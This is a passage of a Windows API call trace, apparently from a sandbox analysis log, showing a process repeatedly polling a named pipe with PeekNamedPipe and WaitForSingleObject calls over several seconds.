nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0072.618] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0072.641] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0072.641] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0072.672] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0072.673] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0072.704] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0072.705] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0072.753] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0072.753] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0072.782] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0072.782] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0072.813] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0072.813] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0072.844] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0072.844] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0072.875] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0072.875] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0072.907] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0072.907] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0072.953] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0072.953] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0072.973] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0072.974] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0073.003] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0073.003] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0073.032] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0073.032] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0073.062] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0073.062] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0073.094] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0073.094] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0073.125] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0073.125] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0073.160] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0073.160] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0073.207] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0073.207] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0073.236] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0073.236] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0073.266] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0073.266] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0073.317] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0073.443] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0073.658] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0073.658] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0073.686] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0073.686] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0073.719] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0073.719] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0073.750] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0073.751] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0073.784] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0073.785] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0073.813] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0073.814] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0073.843] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0073.849] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0073.878] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0073.879] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0074.117] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0074.119] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0074.141] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0074.141] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0074.170] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0074.170] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0074.205] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0074.206] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0074.258] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0074.260] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0074.286] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0074.286] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0074.738] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0074.738] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0074.779] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0074.779] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0074.809] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0074.810] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0074.841] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0074.841] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0076.623] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0076.623] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0076.714] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0076.746] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0076.811] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0076.827] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0077.009] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0077.009] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0077.044] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0077.044] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0077.074] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0077.075] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0077.545] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0077.545] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0077.613] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0077.613] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0077.637] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0077.637] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0079.295] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0079.295] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0079.319] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0079.319] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0079.349] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0079.350] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0079.380] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0079.380] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0079.411] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0079.412] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0079.445] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0079.445] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0079.474] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0079.474] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0079.505] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0079.505] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0079.536] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0079.536] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0079.567] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0079.568] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0079.599] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0079.599] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0079.630] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0079.630] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0079.661] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0079.661] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0079.692] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0079.693] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0079.724] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0079.724] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0079.755] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0079.755] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0079.798] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0079.798] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0079.817] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0079.817] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0080.226] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0080.226] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0080.254] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0080.254] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0080.285] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, 